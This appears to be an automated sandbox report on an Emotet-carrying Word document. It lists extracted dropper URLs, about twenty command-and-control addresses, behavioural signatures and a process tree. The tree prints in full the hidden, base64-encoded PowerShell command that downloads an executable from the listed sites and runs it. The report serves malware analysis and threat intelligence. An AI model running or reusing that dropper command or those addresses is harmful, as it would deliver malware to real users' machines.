Analysis

  • max time kernel
    24s
  • resource
    win10v191014
  • submitted
    24-12-2019 23:22

General

  • Target

    ecc9db7e20004a8efd97edf7ccfbae92d66f42ca1d99ec8f7ef71e0131a96839

  • Sample

    191224-t97e5medbs

  • SHA256

    ecc9db7e20004a8efd97edf7ccfbae92d66f42ca1d99ec8f7ef71e0131a96839

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://www.spectaglobal.com/wp-admin/SELFt1969/

exe.dropper

http://www.emir-elbahr.com/wp-admin/css/1u8825/

exe.dropper

https://www.jwtrubber.com/wp-content/73LYb/

exe.dropper

https://adanzyeyapi.com/wp-includes/dD6121/

exe.dropper

https://www.smartwebdns.net/_vti_bin/0QRGg70/

Extracted

Family

emotet

C2

177.180.115.224:80

177.242.21.126:80

190.210.236.139:80

144.217.117.207:8080

96.126.121.64:443

104.236.137.72:8080

85.234.143.94:8080

5.88.27.67:8080

37.187.6.63:8080

186.15.83.52:8080

201.213.32.59:80

97.81.12.153:80

178.79.163.131:8080

138.68.106.4:7080

217.199.160.224:8080

181.61.143.177:80

189.19.81.181:443

186.68.48.204:443

118.36.70.245:80

80.11.158.65:8080

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ecc9db7e20004a8efd97edf7ccfbae92d66f42ca1d99ec8f7ef71e0131a96839.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:4840
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABLAGoAeABmAGkAcQBnAGMAZQB6AGcAcAB3AD0AJwBYAHEAYQBtAHoAbwBkAHcAeQAnADsAJABHAHMAdQBpAHMAYQBxAGQAbgBnAHEAIAA9ACAAJwA3ADMAJwA7ACQAVwBoAGwAYwBnAHgAcgB3AGEAawBvAHYAYwA9ACcAQgB0AG8AdAB3AGcAbABnAHcAZwBkACcAOwAkAE4AawB5AGoAeABrAHAAaABqAGkAdQBkAHQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEcAcwB1AGkAcwBhAHEAZABuAGcAcQArACcALgBlAHgAZQAnADsAJABIAG0AegBlAGQAcwBrAHYAdAB3AD0AJwBFAHcAZgBtAGMAZgBrAHAAYQBiAGQAagAnADsAJABHAGoAeQBrAHcAYgBkAHUAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4AZQBUAC4AVwBFAEIAQwBMAEkAZQBuAHQAOwAkAFAAZgBvAHQAbQBkAGoAZABhAGwAYgA9ACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcwBwAGUAYwB0AGEAZwBsAG8AYgBhAGwALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFMARQBMAEYAdAAxADkANgA5AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZQBtAGkAcgAtAGUAbABiAGEAaAByAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBjAHMAcwAvADEAdQA4ADgAMgA1AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBqAHcAdAByAHUAYgBiAGUAcgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADcAMwBMAFkAYgAvACoAaAB0AHQAcABzADoALwAvAGEAZABhAG4AegB5AGUAeQBhAHAAaQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AZABEADYAMQAyADEALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHMAbQBhAHIAdAB3AGUAYgBkAG4AcwAuAG4AZQB0AC8AXwB2AHQAaQBfAGIAaQBuAC8AMABRAFIARwBnADcAMAAvACcALgAiAFMAUABMAGAASQBUACIAKAAnACoAJwApADsAJABSAGwAYQBvAHcAYwBqAGgAcAA9ACcASgBzAGsAegB0AGkAdwBwAGIAcwAnADsAZgBvAHIAZQBhAGMAaAAoACQASwBlAGcAbwBmAGoAcAB0AGoAIABpAG4AIAAkAFAAZgBvAHQAbQBkAGoAZABhAGwAYgApAHsAdAByAHkAewAkAEcAagB5AGsAdwBiAGQAdQAuACIAZABgAE8AdwBgAE4ATABgAE8AQQBkAEYASQBsAEUAIgAoACQASwBlAGcAbwBmAGoAcAB0AGoALAAgACQATgBrAHkAagB4AGsAcABoAGoAaQB1AGQAdAApADsAJABVAHQAYQB0AHkAagBmAGkAcAA9ACcAQQB5AHUAZQBhAHcAaAB3AGgAcQBhAHMAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABOAGsAeQBqAHgAawBwAGgAagBpAHUAZAB0ACkALgAiAEwARQBOAGAAZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA3ADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQByAHQAIgAoACQATgBrAHkAagB4AGsAcABoAGoAaQB1AGQAdAApADsAJABIAHQAZwB1AGcAcABpAGYAZwB2AHYAPQAnAFkAagBmAHYAbwB3AGoAYQB5AGUAJwA7AGIAcgBlAGEAawA7ACQAVAB2AGMAcAB0AGEAbgB1AGkAYgBtAGMAPQAnAEYAcwB0AG4AagBlAG4AdwB5AHgAawAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABRAHAAcQBpAG8AawBiAG0AdQA9ACcATgB1AGkAbwBkAHcAeABkAGEAegBxACcA
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4468
    • C:\Users\Admin\73.exe
      "C:\Users\Admin\73.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4628
      • C:\Users\Admin\73.exe
        --54dcd426
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Suspicious behavior: EmotetMutantsSpam
        • Executes dropped EXE
        PID:3800

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\73.exe

  • C:\Users\Admin\73.exe

  • C:\Users\Admin\73.exe

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

  • memory/3800-12-0x0000000002170000-0x0000000002187000-memory.dmp

    Filesize

    92KB

  • memory/3800-13-0x0000000000400000-0x00000000004AA000-memory.dmp

    Filesize

    680KB

  • memory/4628-9-0x00000000022D0000-0x00000000022E7000-memory.dmp

    Filesize

    92KB

  • memory/4840-2-0x000002189F520000-0x000002189F524000-memory.dmp

    Filesize

    16KB